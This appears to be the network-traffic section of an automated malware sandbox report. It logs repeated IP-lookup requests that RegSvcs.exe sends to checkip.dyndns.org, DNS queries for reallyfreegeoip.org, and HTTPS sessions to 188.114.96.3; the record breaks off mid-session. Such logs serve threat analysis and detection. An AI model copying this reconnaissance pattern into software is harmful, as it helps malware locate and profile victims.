                                              Nov 18, 2024 18:21:37.063261986 CET4976780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:37.063261986 CET4976780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:37.068308115 CET8049767132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:37.943816900 CET8049767132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:37.945132971 CET49773443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:37.945219994 CET44349773188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:37.945337057 CET49773443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:37.945547104 CET49773443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:37.945581913 CET44349773188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:37.989815950 CET4976780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:38.614718914 CET44349773188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:38.616844893 CET49773443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:38.616878033 CET44349773188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:38.783349991 CET44349773188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:38.783427000 CET44349773188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:38.783482075 CET49773443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:38.784009933 CET49773443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:38.787957907 CET4976780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:38.788541079 CET4977880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:38.794178009 CET8049767132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:38.794275999 CET4976780192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:38.794466019 CET8049778132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:38.794528008 CET4977880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:38.794673920 CET4977880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:38.799478054 CET8049778132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:39.673593998 CET8049778132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:39.676309109 CET49784443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:39.676353931 CET44349784188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:39.676441908 CET49784443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:39.679092884 CET49784443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:39.679104090 CET44349784188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:39.723773003 CET4977880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:40.321948051 CET44349784188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:40.323695898 CET49784443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:40.323709011 CET44349784188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:40.477658987 CET44349784188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:40.477727890 CET44349784188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:40.477859974 CET49784443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:40.478409052 CET49784443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:40.481758118 CET4977880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:40.483112097 CET4979080192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:40.487108946 CET8049778132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:40.487196922 CET4977880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:40.487947941 CET8049790132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:40.488070965 CET4979080192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:40.488154888 CET4979080192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:40.492969990 CET8049790132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:41.345062971 CET8049790132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:21:41.349895000 CET49796443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:41.349937916 CET44349796188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:41.350172997 CET49796443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:41.350485086 CET49796443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:41.350495100 CET44349796188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:41.395664930 CET4979080192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:21:42.002938986 CET44349796188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:42.004520893 CET49796443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:42.004553080 CET44349796188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:42.416960001 CET44349796188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:42.417033911 CET44349796188.114.96.3192.168.2.5
                                              Nov 18, 2024 18:21:42.417160034 CET49796443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:21:42.417649984 CET49796443192.168.2.5188.114.96.3
                                              Nov 18, 2024 18:22:29.044264078 CET8049714132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:22:29.044409990 CET4971480192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:22:38.287586927 CET8049735132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:22:38.287651062 CET4973580192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:22:39.625020981 CET8049748132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:22:39.628469944 CET4974880192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:22:46.481296062 CET8049790132.226.247.73192.168.2.5
                                              Nov 18, 2024 18:22:46.481532097 CET4979080192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:23:13.380198002 CET4973580192.168.2.5132.226.247.73
                                              Nov 18, 2024 18:23:13.385503054 CET8049735132.226.247.73192.168.2.5
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 18, 2024 18:21:19.507865906 CET6160053192.168.2.51.1.1.1
                                              Nov 18, 2024 18:21:19.516755104 CET53616001.1.1.1192.168.2.5
                                              Nov 18, 2024 18:21:20.782370090 CET5794153192.168.2.51.1.1.1
                                              Nov 18, 2024 18:21:20.790808916 CET53579411.1.1.1192.168.2.5
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 18, 2024 18:21:19.507865906 CET192.168.2.51.1.1.10x12c4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Nov 18, 2024 18:21:20.782370090 CET192.168.2.51.1.1.10xda45Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 18, 2024 18:21:19.516755104 CET1.1.1.1192.168.2.50x12c4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Nov 18, 2024 18:21:19.516755104 CET1.1.1.1192.168.2.50x12c4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Nov 18, 2024 18:21:19.516755104 CET1.1.1.1192.168.2.50x12c4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Nov 18, 2024 18:21:19.516755104 CET1.1.1.1192.168.2.50x12c4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Nov 18, 2024 18:21:19.516755104 CET1.1.1.1192.168.2.50x12c4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Nov 18, 2024 18:21:19.516755104 CET1.1.1.1192.168.2.50x12c4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Nov 18, 2024 18:21:20.790808916 CET1.1.1.1192.168.2.50xda45No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Nov 18, 2024 18:21:20.790808916 CET1.1.1.1192.168.2.50xda45No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              • reallyfreegeoip.org
                                              • checkip.dyndns.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549711132.226.247.73807364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:19.552418947 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:20.416034937 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8fcc52fa805ff6e79e807727e79c4c93
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                              Nov 18, 2024 18:21:20.446110010 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 18, 2024 18:21:20.713268042 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d93b2dd062b55ba241dae4e9fd107c8d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                              Nov 18, 2024 18:21:20.927921057 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d93b2dd062b55ba241dae4e9fd107c8d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                              Nov 18, 2024 18:21:21.931711912 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 18, 2024 18:21:22.190027952 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 26019d5eb4b2272351c3f5499bb44d20
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549714132.226.247.73807364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:23.034779072 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 18, 2024 18:21:23.909157038 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 74484ffe70226f28e56212bb3a6ecd4a
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549716132.226.247.73807364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:25.089791059 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:25.975491047 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d1d0309f7bba1b0a146b92c5ba793ca2
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549718132.226.247.73807364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:26.880819082 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:27.791966915 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 197a7690d53780f3db9776b23e0a65ae
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549721132.226.247.73807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:28.277118921 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:29.156857967 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 520f429ba86481676a007b0d05d53cfe
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                              Nov 18, 2024 18:21:29.160865068 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 18, 2024 18:21:29.422700882 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 1d26e60e82d3401135a428a38652ecba
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                              Nov 18, 2024 18:21:30.392301083 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 18, 2024 18:21:30.663184881 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: dfd34ed7a700e759b068cfc558255a24
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.549723132.226.247.73807364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:28.699466944 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:29.555248022 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 00e830c6cbf813b9cd67842224134fca
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.549729132.226.247.73807364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:30.410052061 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:31.299364090 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ee856a1c527e7dc6ab1c7f715812c38f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.549733132.226.247.73807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:31.505584955 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 18, 2024 18:21:32.474581957 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9c3ed2f8330839aa561375cf9461d288
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.549735132.226.247.73807364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:32.232359886 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:33.369868040 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 6a2c6bb56ef33cc031007a78d57b0e46
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                              Nov 18, 2024 18:21:33.395868063 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 6a2c6bb56ef33cc031007a78d57b0e46
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.549748132.226.247.73807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:33.567935944 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 18, 2024 18:21:34.471199989 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 65d15079c463bbcc2869054b081ceef0
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.549757132.226.247.73807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:35.302304983 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:36.199075937 CET323INHTTP/1.1 200 OK
